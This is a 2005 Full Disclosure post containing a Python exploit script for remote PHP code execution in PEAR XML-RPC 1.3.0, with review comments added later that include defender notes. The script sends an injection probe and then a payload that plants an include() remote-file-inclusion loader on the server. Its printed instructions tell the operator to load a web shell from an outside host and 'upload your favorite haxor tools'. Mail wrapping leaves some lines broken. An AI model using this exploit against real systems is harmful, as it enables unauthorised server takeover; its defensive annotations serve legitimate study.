
Full Disclosure - XMLRPC Exploit Code written in Python jul 2005



#!/usr/bin/python

# ./xmlrpc.py [chk|xpl] host uri
# example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php
# example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php
# Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not working
# for me
# so i made this python code
# http://pear.php.net/bugs/bug.php?id=4692
# Bug #4692     Remote Code Execution In XML RPC Server
# xmlrpc.pl http://pathtoxmlrpc/server
# "id;pwd;uname -a;uptime"
# [*] Sending command id;pwd;uname -a;uptime
# [*] Command sent, waiting for response
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# /var/www/drupal
# Linux cacophony 2.4.18-bf2.4  Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
# 23:27:22 up 5 days,  9:05,  0 users,  load average: 0.12, 0.16, 0.21
# http://www.postnuke.com/xmlrpc.php
# by k3rn3lp4nic. greetz: albanian security clan!!! july 2005


import sys, httplib

# Positional arguments with fallbacks: mode, target host, request path.
# The fallbacks are live values (a public site and its XML-RPC endpoint), so
# running the script with no arguments at all still sends a probe request to
# that third-party host.  None of the values is validated.
try:
        chose = sys.argv[1]  # "chk" (probe) or "xpl" (payload); anything else is rejected in main
except IndexError:
        chose = 'chk'

try:
        host = sys.argv[2]  # passed verbatim to httplib.HTTP and the Host header
except IndexError:
        host = 'www.postnuke.com'

try:
        uri = sys.argv[3]  # request path, used verbatim in the POST request line
except IndexError:
        uri = '/xmlrpc.php'


def check():
        """Send the probe request for the PEAR XML-RPC 1.3.0 bug named in the header.

        The <name> value is built to terminate a quoted PHP expression on the
        server side (the leading ','))), append phpinfo(); exit; and comment out
        whatever follows with /*.  Nothing is returned: the raw HTTP response is
        printed and the operator judges success by eye.
        """
        # The triple-quoted literal keeps the source indentation inside the request
        # body; Content-length below is computed over this same string, so the
        # two stay consistent.
        SoapMessage = """<?xml version="1.0"?>
        <methodCall>
        <methodName>test.method</methodName>
                <params>
                        <param>
                        <value><name>','')); phpinfo(); exit;/*</name></value>
                        </param>
                </params>
        </methodCall>
        """

        # Legacy Python 2 httplib.HTTP interface (putrequest/putheader/getreply/
        # getfile); it does not exist in Python 3's http.client.  No timeout is
        # set, so an unresponsive host blocks the script indefinitely.
        webservice = httplib.HTTP("%s" % host)
        webservice.putrequest("POST", "%s" % uri)
        webservice.putheader("Host", "%s" % host)
        # NOTE(review): as posted, this string literal (and several print
        # statements further down) is split across two lines by mail wrapping,
        # so the listing does not parse as-is.  The distinctive User-Agent is a
        # simple log-side indicator for this tool.
        webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke 
k3rn37p4nic")
        webservice.putheader("Content-type", "application/xml")
        webservice.putheader("Content-length", "%d" % len(SoapMessage))
        webservice.endheaders()
        webservice.send(SoapMessage)

        # get the response

        # The status code is never checked programmatically; the untrusted
        # response body is printed to the terminal unfiltered.
        statuscode, statusmessage, header = webservice.getreply()
        print "Response: ", statuscode, statusmessage
        print "headers: ", header
        res = webservice.getfile().read()
        print res
        print 'If you see phpinfo dump data the you are succeful. proceed with 
xpl!'

def xpl():
        """Send the same injection as check(), carrying a PHP file-writing payload.

        The injected PHP writes a one-line loader, xmlrpcpy.php, containing
        include($inc) into the server's current directory, then lists it back.
        Nothing is returned; the raw HTTP response is printed and followed by
        manual follow-up instructions.

        Defender notes: the loader is a remote-file-inclusion hook.  $inc is
        never read from $_GET, so the printed usage (?inc=http://...) presumably
        depends on register_globals being enabled -- TODO confirm.  Fixing the
        XML-RPC library, keeping register_globals and allow_url_include off, and
        denying the web-server user write access to the document root each
        break this chain.  A POST to the XML-RPC endpoint whose <name> value
        contains '')) and /* is a usable detection signature.
        """
        # The $somecontent string is assembled with placeholder characters and
        # then rewritten: '%' -> '<' (chr 60), '~' -> '$' (chr 36), '#' -> '>'
        # (chr 62).  Presumably this keeps literal '<', '$' and '>' out of the
        # XML body -- TODO confirm.  del/dir/type are Windows cmd builtins, so
        # the passthru() calls only produce output on a Windows host; the
        # fopen/fwrite part is platform-independent.
        SoapMessage = """<?xml version="1.0"?>
        <methodCall>
        <methodName>test.method</methodName>
                <params>
                        <param>
                        <value><name>',''));
        echo 'start';
        passthru('del xmlrpcpy.php');
        $filename = 'xmlrpcpy.php';
        $somecontent = '%?php include(~inc); ?#';
        $somecontent = eregi_replace('%', chr(60), $somecontent);
        $somecontent = eregi_replace('~', chr(36), $somecontent);
        $somecontent = eregi_replace('#', chr(62), $somecontent);
        $handle = fopen($filename,'w');
        fwrite($handle, $somecontent);
        fclose($handle);

        passthru('dir');

        passthru('type xmlrpcpy.php');


        echo 'done';
        exit;
        /*</name></value>
                        </param>
                </params>
        </methodCall>
        """

        # Same legacy httplib.HTTP sequence as check(): no timeout, no TLS, and
        # the Content-length is computed over the indented literal above.
        webservice = httplib.HTTP("%s" % host)
        webservice.putrequest("POST", "%s" % uri)
        webservice.putheader("Host", "%s" % host)
        webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke 
k3rn37p4nic")
        webservice.putheader("Content-type", "application/xml")
        webservice.putheader("Content-length", "%d" % len(SoapMessage))
        webservice.endheaders()
        webservice.send(SoapMessage)

        # get the response

        # The 'start' / 'done' markers and the directory listing echoed by the
        # payload would appear in this body; it is printed raw and never parsed,
        # and "Exploit Successful" is printed regardless of what came back.
        statuscode, statusmessage, header = webservice.getreply()
        print "Response: ", statuscode, statusmessage
        print "headers: ", header
        res = webservice.getfile().read()
        print res
        print '\n\nExploit Successful!!!\nDownload 
http://www.suneworld.com/programs/webexplorer20.zip'
        print 'Rename index.php3 to index.txt and put it to some public host 
http://somehost.com/index.txt'
        print 'Now Accessed it like this: '
        print 
'http://victimhost/postnukewhatever/xmlrpcpy.php?inc=http://somehost.com/index.txt'
        print 'Then upload your favorite haxor tools! Bye. Stay healthy!'

if __name__ == "__main__":
        # Banner and usage text, printed unconditionally before dispatch.
        print 'xmlrpc exploit R/1.1 4 postnuke by k3rn37p4nic'
        print 'revised it if you can! ver jul 2005'
        print 'Greetz: Albanian Security Clan!!!'
        print '---------------------------------------------'
        print './xmlrpc.py [chk|xpl] host uri'
        print 'example (check bug): ./xmlrpc.py chk www.postnuke.com 
/xmlrpc.php'
        print 'example (exploit bug): ./xmlrpc.py xpl www.postnuke.com 
/xmlrpc.php'
        # Dispatch on the first argument.  Because `chose` defaults to 'chk'
        # and `host`/`uri` default to a live public endpoint, invoking the
        # script with no arguments is not a dry run -- it sends the probe.
        if chose=='chk':
                check()
        elif chose=='xpl':
                xpl();
        else:
                print 'Boom! Script Kiddie'